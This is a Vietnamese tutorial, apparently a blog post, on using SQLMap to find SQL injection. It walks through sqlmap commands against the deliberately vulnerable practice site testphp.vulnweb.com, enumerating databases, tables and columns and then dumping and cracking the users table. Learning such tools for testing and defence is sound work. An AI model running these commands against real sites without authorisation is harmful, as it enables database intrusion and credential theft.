Cách sử dụng SQLMap để tìm lỗ hổng SQL injection
SQLMap là một công cụ nguồn mở tự động tìm và khai thác các lỗ hổng SQL injection. Bạn có thể sử dụng nó để kiểm tra các ứng dụng web về SQL injection và giành quyền truy cập vào cơ sở dữ liệu dễ bị tấn công.
Dành cho những ai chưa biết SQL injection là một kỹ thuật hack web trong đó kẻ tấn công chèn mã độc vào một câu lệnh SQL.
Khi kẻ tấn công chiếm quyền kiểm soát cơ sở dữ liệu, hắn có thể thực hiện các truy vấn SQL độc hại đối với trang web dễ bị tấn công và có thể truy xuất, chỉnh sửa hoặc xóa các bảng.
Các truy vấn này có thể được tạo và thực thi tự động bởi SQLMap.
Cài đặt SQLMap
Bạn có thể cài đặt SQLMap trên các hệ thống Linux dựa trên Debian bằng lệnh sau:
apt install sqlmap
Để sử dụng SQLMap, bạn cần xác định một trang web dễ bị tấn công SQL injection. Trong trường hợp của tôi, tôi sẽ sử dụng một trang web dễ bị tấn công.
http://testphp.vulnweb.com/showforum.asp?id=1
Giả sử một trang web liệt kê thông tin bằng tham số id — ví dụ: website.com/page.php?id=1.
Điều này có thể được chuyển thành đầu vào cho SQLMap và SQLMap sẽ tự động quét trang web để xem liệu trang web có dễ bị tấn công SQL hay không.
Tiếp theo, sử dụng lệnh sau trên hệ thống Linux của bạn:
sqlmap -u http://testphp.vulnweb.com/showforum.asp?id=1 --dbs
Cờ -u được sử dụng để chỉ định một URL và lệnh — dbs yêu cầu SQLMap cố gắng liệt kê cơ sở dữ liệu.
Tôi nhận được kết quả sau đây cho thấy có bảy cơ sở dữ liệu khả dụng.
Truy xuất các bảng cơ sở dữ liệu
Bây giờ, hãy tìm kiếm các bảng trong cơ sở dữ liệu acublog bằng lệnh sau:
sqlmap -u http://testphp.vulnweb.com/showforum.asp?id=1 --tables –D acublog
Liệt kê thông tin từ một bảng cụ thể
Nếu bạn muốn xem các cột của một bảng cụ thể, bạn có thể sử dụng lệnh sau:
sqlmap -u http://testphp.vulnweb.com/showforum.asp?id=1 --columns -D acublog –T users
Bước cuối cùng là kết xuất và bẻ khóa mật khẩu từ bảng người dùng bằng lệnh sau:
sqlmap -u http://testphp.vulnweb.com/showforum.asp?id=1 --dump -D acublog –T users
Phần kết luận
SQLMap là một công cụ mạnh mẽ giúp bạn tìm ra các lỗ hổng SQL injection. Điều quan trọng đối với các nhà phát triển web là phải làm quen với SQLMap để bảo vệ chống lại các cuộc tấn công SQL injection.
Cảm ơn bạn đã đọc!

![Dù sao thì một danh sách được liên kết là gì? [Phần 1]](https://post.nghiatu.com/assets/images/m/max/724/1*Xokk6XOjWyIGCBujkJsCzQ.jpeg)



































